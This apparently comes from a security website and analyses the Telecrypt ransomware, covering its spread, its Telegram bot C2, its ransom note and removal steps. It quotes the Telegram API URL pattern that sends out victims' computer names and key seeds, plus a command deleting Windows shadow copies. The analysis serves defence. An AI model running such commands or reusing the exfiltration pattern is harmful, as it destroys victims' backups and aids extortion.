Hey you,
BE IN THE KNOW!

35,000 ransomware infections per month and you still believe you are protected?

Sign up to receive:

  • alerts
  • news
  • free how-to-remove guides

of the newest online threats - directly to your inbox:


Remove Telecrypt Virus and Restore .Xcri Files

stf-telecrypt-ransomware-telegram-crypt-virus-greeting-your-files-are-crypted

Telecrypt is how a new cryptovirus was dubbed by malware researchers because of its use of telegram channels. The encrypted files will have the extension .Xcri placed after their name. A window will pop up after the encryption process is finished, containing the ransom message, which is written in Russian. To see how to remove this ransomware and how you can try to restore your files, read the article till its end.

Threat Summary

Name Telecrypt
Type Ransomware, Cryptovirus
Short Description The ransomware will encrypt your files and then display a window with the ransom note and instructions for payment written entirely in Russian.
Symptoms Encrypted files will receive the extension .Xcri appended after their names.
Distribution Method Spam Emails, Email Attachments
Detection Tool See If Your System Has Been Affected by Telecrypt

Download

Malware Removal Tool

User Experience Join Our Forum to Discuss Telecrypt.
Data Recovery Tool Data Recovery Pro by ParetoLogic Notice! This product scans your drive sectors to recover lost files and it may not recover 100% of the encrypted files, but only few of them, depending on the situation and whether or not you have reformatted your drive.

Telecrypt Virus – Spread

The Telecrypt ransomware could enter your computer machine in a few ways. The payload file could be spread through spam emails. Often, these spam emails have an attached file and presented as important and requiring immediate action. In case you open the attachment, it will release the malware onto your computer system.

The Telecrypt virus could infect your computer by spreading its file containing the payload via social media and file-sharing services. Do not open files that come with suspicious emails, links or from unknown sources. Before you open them, you should first perform a scan with a security program and check the files, their size and signatures. You should read the tips for preventing ransomware from the topic in our forums.

Telecrypt Virus – Analysis

The Telecrypt virus was found by Kaspersky’s malware researchers who dubbed it that way. The name is derived from the fact that it uses telegram channels as C2 (Command&Control) servers. The ransomware is coded in the Delphi programming language, and it is not the first malware coded in that language.

Before the Telecrypt virus starts encrypting files, it performs a series of actions. Firstly, it creates a Telegram bot through the Telegram API. This API generates a token ID for every new bot that is created. Secondly, when you launch the Telegram binary, the cryptovirus pings the aforementioned API at the address https://api.telegram.org/bot/GetMe with the received token. That is performed to check if the bot is still active and not banned by Telegram administrators.

Afterward, the Telecrypt ransomware uses the program’s protocol to post a message to a Telegram channel, that has an ID hardcoded in the cryptovirus. The format of the message is the following:

→https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >

Source: BleepingComputer

That command will get the cybercriminals information just like a C2 server. The information includes:

  • Names of the compromised computers
  • IDs of these compromised machines
  • Token IDs of the compromised PCs
  • Key Seed containing the string number used for the generation of the file encryption key

After that, the Telecrypt ransomware searches to encrypt various files.

The following directory contains information about the files that the virus has encrypted on your machine:

→%USERPROFILE%\Desktop\База зашифр файлов.txt

When the encryption process is complete, you will see a window with information. That information is written in Russian, but it is the actual ransom message. You can see a screenshot of that message right here:

stf-telecrypt-ransomware-telegram-crypt-virus-greeting-your-files-are-crypted

It reads the following:

Ярлык добавлен на рабочий стол!
Здравствуйте! Мы взломали Ваш компьютер! Все Ваши файлы форматов: doc, xls, jpg, jpeg, png, pdf, базы 1с, теперь зашифрованы. Вы можете проверить это прямо сечай!!! Что же Вам делать?
1) Вы можете удалить ярльк этой программы, но это не
поможет.
2) Вы можете вызвать мастера, но это не поможет(файлы не могут бьты рашифрованы без специального ключа).
3) Вы можете переустановить Windows, но это не поможет(все
ваши файлы будут удалены).
4) Вы можете нажать далее…

A rough translation in English reads:

The shortcut is added to your desktop!
Hello! We broke into your computer! All your file formats: doc, xls, jpg, jpeg, png, pdf, 1c base are now encrypted. You can check it out right now!!! What do you do?
1) You can remove this program, but it is not going to help.
2) You can call the master, but that does not help (files cannot be decrypted without a special key).
3) You can reinstall Windows, but it does not help (all
your files will be removed).
4) You can click on next …

If you click on the button Далее / Next, you will get 2 more windows:

stf-telecrypt-ransomware-telegram-crypt-virus-ransom-price-for-key

and

stf-telecrypt-ransomware-telegram-crypt-virus-id-how-to-unlock

In the next two windows, the cybercriminals explain that they want you to pay them 5000 Rubles – the equivalent of 50 US dollars. Also, Kaspersky researchers say that the final sentence on the last window states the following:

Thank you for helping Young Programmers Fund.

You should NOT think of paying as by doing it you might support some script kiddies or other cyber criminals. Nobody can guarantee you that paying will return your files to their normal state. Moreover, the crooks will probably use the money to create more ransomware.

The Telecrypt ransomware will encrypt files and put .Xcri as their new file extension. The following list contains the file extensions which the virus searches to encrypt:

→.doc, .docx, .jpg, .jpeg, .pdf, .png, .dt, .xls, .xlsx, .cd, .dbf

Only those 11 extensions will get encrypted, but those are more than enough to cause you a big headache. The Telecrypt virus is very likely to delete the Shadow Volume Copies from the Windows operating system by using the following command:

→vssadmin.exe delete shadows /all /Quiet

Continue to read and see what kind of methods you can try for the restoration of your files.

Remove Telecrypt and Restore .Xcri Files

If your computer got infected with the Telecrypt ransomware, you should have some experience in removing malware. You should get rid of this ransomware as fast as possible before it can have the chance to spread further and infect more computers. You should remove the ransomware and follow the step-by-step instructions guide given below. To see ways that you can try to recover your data, see the step titled 2. Restore files encrypted by Telecrypt.

Manually delete Telecrypt from your computer

Note! Substantial notification about the Telecrypt threat: Manual removal of Telecrypt requires interference with system files and registries. Thus, it can cause damage to your PC. Even if your computer skills are not at a professional level, don’t worry. You can do the removal yourself just in 5 minutes, using a malware removal tool.

1. Boot Your PC In Safe Mode to isolate and remove Telecrypt files and objects
2.Find malicious files created by Telecrypt on your PC

Automatically remove Telecrypt by downloading an advanced anti-malware program

1. Remove Telecrypt with SpyHunter Anti-Malware Tool and back up your data
2. Restore files encrypted by Telecrypt
Optional: Using Alternative Anti-Malware Tools

Berta Bilbao

Berta is the Editor-in-Chief of SensorsTechForum. She is a dedicated malware researcher, dreaming for a more secure cyber space.

More Posts - Website

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...
Please wait...

Subscribe to our newsletter

Want to be notified when our article is published? Enter your email address and name below to be the first to know.